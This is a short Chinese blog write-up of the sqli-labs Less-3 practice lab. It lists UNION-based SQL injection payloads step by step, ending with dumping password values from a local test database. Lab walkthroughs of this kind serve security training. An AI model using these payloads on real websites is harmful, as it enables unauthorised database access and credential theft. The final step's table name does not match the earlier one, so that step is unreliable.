Sqli-labs 3

hacker_17Z2024-07-11 23:44

1.按照路径http://localhost/sqli-labs/sqli-labs-master/Less-3/进入

2.判断注入类型----字符型

Payload:?id=1') and 1=1--+

注:根据报错提示的语法错误,在第一行中使用接近'union select 1,2,3--')的正确语法

3.判断注入点:2,3

Payload:id=-1') union select 1,2,3 --+

4. 根据注入点查询指定数据库名----security

Payload:id=-1') union select 1,database(),3 --+

5.查询指定数据库名下的表名

Payload:

id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+

6.查询指定表----users下的字段名

Payload:

id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+

7.查询指定字段名:password

Payload:

id=-1') union select 1,password,3 from emails--+

相关推荐
异世界贤狼转生码农1 小时前
MongoDB Windows 系统实战手册:从配置到数据处理入门
数据库·mongodb
wei_shuo2 小时前
时序数据库 Apache IoTDB:从边缘到云端Apache IoTDB 全链路数据管理能力、部署流程与安全特性解读
物联网·apache·时序数据库·iotdb
QuZhengRong2 小时前
【数据库】Navicat 导入 Excel 数据乱码问题的解决方法
android·数据库·excel
码农阿豪2 小时前
Windows从零到一安装KingbaseES数据库及使用ksql工具连接全指南
数据库·windows
时序数据说7 小时前
时序数据库市场前景分析
大数据·数据库·物联网·开源·时序数据库
听雪楼主.11 小时前
Oracle Undo Tablespace 使用率暴涨案例分析
数据库·oracle·架构
我科绝伦(Huanhuan Zhou)11 小时前
KINGBASE集群日常维护管理命令总结
数据库·database
妖灵翎幺11 小时前
Java应届生求职八股(2)---Mysql篇
数据库·mysql
HMBBLOVEPDX11 小时前
MySQL的事务日志:
数据库·mysql
YA33313 小时前
java基础(九)sql基础及索引
java·开发语言·sql
热门推荐
01UV安装并设置国内源02Qwen3-Coder 快速上手教程 | Qwen Code + Claude Code03【2025.08.06最新版】Android Studio下载、安装及配置记录(自动下载sdk)04KGG转MP3工具|非KGM文件|解密音频052025最新国内服务器可用docker源仓库地址大全(2025年8月更新)06TRAE 规则(Rules)配置指南:个人习惯、团队规范与最佳实践07蜘蛛磁力 搜索引擎大全,如何使用蜘蛛磁力查找磁力链接08NVIDIA显卡驱动、CUDA、cuDNN 和 TensorRT 版本匹配指南09阿里开源首个图像生成基础模型——Qwen-Image本地部署教程,超强中文渲染能力刷新SOTA!10TRAE Rules 实践:为项目配置 6A 工作流